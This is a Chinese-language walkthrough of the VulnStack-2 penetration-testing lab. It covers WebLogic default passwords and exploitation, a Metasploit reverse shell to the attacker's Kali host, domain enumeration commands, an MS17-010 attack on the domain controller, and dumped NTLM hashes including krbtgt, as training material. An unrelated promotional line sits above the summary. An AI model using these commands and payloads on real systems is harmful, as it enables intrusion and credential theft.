核心内容摘要
全球审美图鉴:欧美日韩国产精品推荐,开启你的高质感生活之旅
本教程围绕 VulnStack-2 靶场展开从外网信息收集、漏洞利用获取初始权限入手逐步讲解内网横向移动、黄金票据提权的完整渗透流程带你沉浸式体验真实内网攻防场景。
文章目录靶场介绍攻击技术网络配置信息内网网段设置NAT网段设置靶机设置WEB.de1ay主机配置登陆WEB主机WEB网络配置PC.de1ay主机配置DC.de1ay主机配置信息收集目标网段扫描漏洞利用获取主机权限发现Weblogic漏洞Weblogic漏洞利用冰蝎连接生成shell通过冰蝎将WebLogic服务器上线到Metasploit内网信息收集成功getshell后渗透密码复用和权限提升黄金票据
总结靶场介绍攻击技术本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relayEWS relayPTT(PTC)MS
GPPSPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。
Bypass UACWindows系统NTLM获取理论知识Windows认证Access Token利用MSSQL利用WMI利用网页代理二层代理特殊协议代理DNSICMP域内信息收集 域漏洞利用SMB relayEWS relayPTT(PTC)MS
GPPSPN利用域凭证收集后门技术黄金票据/白银票据/SidHistory/MOF网络配置信息关于靶场统一登录密码1qazWSX内网网段
10.
10.
1
0/24DMZ网段
192.
168.
4
0/24防火墙策略策略设置过后测试机只能访问192段地址模拟公网访问内网网段设置首先打开编辑“——”虚拟网络编辑器“然后点击”更改设置“——创建一个新的VMnet并将网段设置为子网
10.
10.
1
0子网掩码
255.
255.
2
0DHCP设置里的设置与上面的一样即可NAT网段设置具体设置与内网网段差不多这里我设置的是
192.
168.
4
0/24靶机设置WEB.de1ay主机配置登陆WEB主机我们首先设置给WEB主机两个网络适配器随后在尝试登陆WEB.de1ay.com时输入密码我们会发现登录失败是因为我们此时登录的用户是web\de1ay而不是de1ay\de1ay两者是不同的账号密码自然不一样所以我们需要点击快照 —返回到v
3 —然后点击放弃 —放弃后再开机 —用其他用户 —输入账号密码一定要点击放弃不然就会改变v
3快照的状态只能删掉重新安装WEB主机de1ay\de1ay 1qazWSX这个时候我们即可成功登录WEB主机成功切换为de1ay\de1ay用户WEB网络配置接下来我们要修改网络设置先查看修改配置前的网段
10.
10.
10.
80192.
168.
1
80随后”控制面板“—”网络和Internet“”网络和共享中心“ —”更改适配器设置“”分别右键两个网卡“ —”属性“ ”输入管理员账号密码“ —用户名:de1ay\administrator 密码:1qazWSX“双击ipv4协议-属性”—“自动获得ip地址和DNS地址”随后我们重新输入命令ipconfig查看IP地址NAT网段
192.
168.
4
163内网网段
10.
10.
1
10成功进行修改PC.de1ay主机配置同样是配置两个网段首先查看一下未修改前的网络
192.
168.
111.
20110.
10.
1
201网络配置还是一样的步骤打开控制面板——更改网络适配器设置两个本地连接都需要修改de1ay\administrator 1qazWSX自动获取IP地址和DNS服务器随后查看修改后的IP地址NAT网段
192.
168.
4
164内网网段
10.
10.
1
11DC.de1ay主机配置直接输入密码1qazWSX进入主机网络配置还是和之前一样这个主机只配置内网网卡步骤不再赘述查看IP地址未修改前修改后内网网段
10.
10.
1
12至此三台主机的网络配置均已完成接下来就进行我们的渗透横向操作信息收集靶机环境网络拓扑示意图(PC的内网网段是
10.
10.
1
11图中标错了)Web服务器设置双网卡域成员主机同样双网卡的设置内网的域控主机只需设置内网网段保证内网主机彼此互通且无法访问外网完成上述操作后开启各主机开启Web服务器的WebLogic服务即在C:\Oracle\Middleware\user_projects\domains\base_domain\bin目录下;以管理员身份运行文件名为startWebLogic的Windows命令脚本启动成功后实时显示服务目标网段扫描这里我们打开Kali对目标Web服务器的NAT网段
192.
168.
4
0/24进行基本的信息收集kali的IP地址为
192.
168.
4
146# 搜索目标主机IPnmap -sP
192.
168.
4
0/24# 收集端口以及服务信息nmap -sC -sV -A -T4 -p-
192.
168.
4
163继续收集详细的信息从收集到的信息我们可以看见目标Web服务器开放了不少服务端口80/tcpHTTP服务基础的网页浏览Web服务135/tcpMSRPC微软远程过程调用用于Windows进程间通信139/tcpNetBIOS-SSNWindows文件、打印机共享等功能的会话服务445/tcp基于SMB协议的Windows文件/打印机共享服务1433/tcp微软SQL Server数据库的默认服务端口3389/tcpMS-WBT-ServerWindows远程桌面RDP的服务端口7001端口通常对应OracleWebLogic Server服务用于其管理控制台或Web应用部署的HTTP服务漏洞利用获取主机权限发现Weblogic漏洞这里我们打开Web页面发现确实一篇空白于是我们只好访问7001端口Weblogic服务http://
192.
168.
4
163:7001/可以发现是很标准的Weblogic报错页面随后我们进入到他的后台登陆地址http://
192.
168.
4
163:7001/console/login/LoginForm.jsp我们要知道的是Weblogic是存在弱口令以及其他RCE漏洞的漏洞类型对应编号/内容SSRFCVE-
任意文件上传CVE-
XMLDecoder反序列化CVE-
Java反序列化CVE-
弱口令Weblogic / Oracle123还有很多CVE这里只是很少一部分# 默认的弱口令system/password system/Passw0rd weblogic/weblogic admin/security joe/password mary/password system/security wlcsystem/wlcsystem wlpisystem/wlpisystem对于刚入门的师傅来说我是强烈推荐手工使用BP抓包并按照payload去访问漏洞的因为手工注入能够巩固练习你的能力而不是只简单成为一个脚本小子自动化工具使用这里为了节省时间我使用工具对网站进行渗透我简单的测试了几个可以发现确实是存在漏洞的Weblogic漏洞利用冰蝎连接生成shell我们根据上述存在漏洞随便选一个进行shell注入随后用冰蝎访问选择jsp文件成功连接通过冰蝎将WebLogic服务器上线到Metasploit这个MSF是Java类型的受限相比正常执行payload反弹的会话是不一样的至此我们已经成功获得了Web服务器的webshell且该webshell的权限为普通用户web\de1ay的权限因此接下来需要进行提权操作。
思路通过冰蝎将我们的恶意程序上传并以管理员权限运行先生成一个payloadx64的会失败所以用x86的然后将其上传到WEB机器上随后kali建立监听use exploit/multi/handlersetpayload windows/meterpreter/reverse_tcpsetlhost
192.
168.
4
131setlport8888run成功上线得到WEB主机的SYSTEM权限内网信息收集成功getshell因为内网的信息收集涉及的范围十分的广所以这里简单的说一下进入shell后执行命令收集信息net view# 查看局域网内其他主机名net config Workstation# 查看计算机名、全名、用户名、系统版本、工作站、域、登录域net user# 查看本机用户列表net user /domain# 查看域用户net localgroup administrators# 查看本地管理员组通常会有域用户net view /domain# 查看有几个域net user 用户名 /domain# 获取指定域用户的信息net group /domain# 查看域里面的工作组查看把用户分了多少组只能在域控上操作net group 组名 /domain# 查看域中某工作组net groupdomain admins/domain# 查看域管理员的名字net groupdomain computers/domain# 查看域中的其他主机名net groupdoamin controllers/domain# 查看域控制器主机名可能有多台具体过程可以看这篇文章内网横向——Vulnstack-1靶场复现万字解析手把手教学随后对内网进行信息收集后知道了域控IP为
10.
10.
1
12随后对域控进行永恒之蓝漏洞的探测use auxiliary/scanner/smb/smb_ms17_010setrhosts
10.
10.
1
10 run确实存在尝试使用msf内置的漏洞利用模块use exploit/windows/smb/ms17_010_psexecsetrhosts
10.
10.
1
12setpayload windows/x64/meterpreter/bind_tcpsetlport443run成功拿到域控主机的权限后渗透密码复用和权限提升黄金票据接下来我们对域进行信息收集首先我们在之前的Web服务器上加载kiwi提取服务器上储存的密码会话1和3是WEB主机的administrator和SYSTEM权限而会话4就是永恒之蓝获取的域控DC的SYSTEM权限sessions4load kiwi creds_all我们成功提取到了两个账号的明文密码但是这里没有域管理员的账号密码。
这里我们使用smart_hashdump模块提取域控中的哈希use post/windows/gather/smart_hashdumpsetsession4run执行命令获得的结果如下[]Administrator:500:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24[]krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb[]de1ay:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24[]mssql:2103:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24[]DC$:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0[]PC$:1105:aad3b435b51404eeaad3b435b51404ee:ce3e307123b59b4c481286308ae8fc2b[]WEB$:1603:aad3b435b51404eeaad3b435b51404ee:f4f5b9220fe6871db01b9a336cb1a1ba成功提取到了域内成员的hash值并且我们发现域管理员的hash和其它域成员的hash相同这说明域管理员使用了和域成员相同的密码该靶场存在密码复用如果密码不相同我们可以通过哈希传递进行横向移动这样我们可以就获得了域管理员的账号密码。
总结通过本次 VulnStack-2 靶场实战我们完整走完从外网打点到内网横向渗透、黄金票据提权的全流程掌握了 MSF 联动内网信息收集、权限复用等关键技巧。
不仅深化了内网攻防逻辑的理解更建立起从漏洞发现到权限维持的完整思维链。
靶场是技术试金石持续复盘与实践才能在真实对抗中快速响应、精准突破让渗透能力在实战打磨中稳步提升。
期待下次再见